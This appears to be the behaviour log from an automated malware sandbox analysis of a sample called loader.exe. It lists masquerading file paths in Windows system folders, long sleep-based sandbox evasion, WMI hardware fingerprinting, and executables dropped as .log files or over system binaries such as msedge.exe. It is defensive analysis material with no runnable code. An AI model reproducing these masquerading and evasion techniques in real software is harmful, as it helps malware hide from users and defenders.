                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 1040000 memory reserve | memory write watch
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 1ACF0000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: 1420000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: 1AF90000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: B40000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: 1A590000 memory reserve | memory write watch
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: 1430000 memory reserve | memory write watch
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 970000 memory reserve | memory write watch
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: F60000 memory reserve | memory write watch
                                    Source: C:\Recovery\conhost.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: A20000 memory reserve | memory write watch
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMemory allocated: 1A600000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006CCE52 sldt word ptr [eax]0_2_006CCE52
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599500Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597266Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597138Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596875Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596531Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595047Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594469Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594110Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591577Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590438Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589891Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589233Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588907Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588061Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 587141Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586313Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586016Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585091Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 584762Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583985Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583672Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583424Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583187Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583062Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582953Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582732Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582406Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582184Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582078Jump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeWindow / User API: threadDelayed 639Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWindow / User API: threadDelayed 6840Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWindow / User API: threadDelayed 2705Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZPhRdffT.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\PHEbWhMM.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\SSuSBQke.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\OTzTkTQO.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\pOvooSqL.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\BLdnhdFQ.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\kmFpzVgz.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\JgiUHXBa.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\XCTiUwVw.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\keVXUmFt.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe TID: 2264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 4900Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599890s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599703s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599500s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 6268Thread sleep time: -3600000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -599094s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -598407s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -598203s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597485s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597266s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -597138s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -596875s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -596531s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -595344s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -595047s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -594766s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -594469s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -594110s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -593844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -593625s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -593328s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 6268Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -592407s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -592094s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591577s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591297s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -591000s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -590438s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -590203s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -589891s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -589516s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -589233s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -588907s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -588453s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -588061s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -587141s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -586719s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -586313s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -586016s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -585719s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -585453s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -585091s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -584762s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583985s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583672s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583424s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583297s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583187s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -583062s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582953s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582844s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582732s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582625s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582516s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582406s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582297s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582184s >= -30000sJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe TID: 1212Thread sleep time: -582078s >= -30000sJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe TID: 948Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\conhost.exe TID: 3796Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe TID: 3212Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe TID: 3908Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe TID: 5648Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\conhost.exe TID: 7008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeLast function: Thread delayed
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063A69B FindFirstFileW,FindFirstFileW,0_2_0063A69B
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF6859 NtQueryInformationProcess,GetSystemInfo,0_2_04FF6859
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599500Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 599094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 598203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597485Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597266Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 597138Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596875Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 596531Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 595047Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594766Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594469Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 594110Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592407Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591577Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590438Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589891Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589233Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588907Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588061Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 587141Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586313Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586016Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585091Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 584762Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583985Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583672Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583424Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583187Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583062Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582953Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582732Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582406Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582184Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582078Jump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
